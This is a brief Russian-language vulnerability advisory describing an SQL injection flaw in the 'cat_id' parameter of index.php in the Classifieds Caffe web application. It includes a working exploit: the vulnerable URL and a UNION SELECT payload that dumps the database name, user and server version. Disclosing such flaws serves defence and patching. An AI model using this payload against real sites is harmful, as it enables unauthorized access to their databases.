Программа: Classifieds Caffe

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

/index.php?action=add&cat_id=[SQL]

7’+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*



Оставить мнение